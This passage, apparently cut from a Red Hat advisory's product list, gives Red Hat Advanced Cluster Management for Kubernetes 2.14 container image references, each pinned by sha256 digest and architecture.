"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
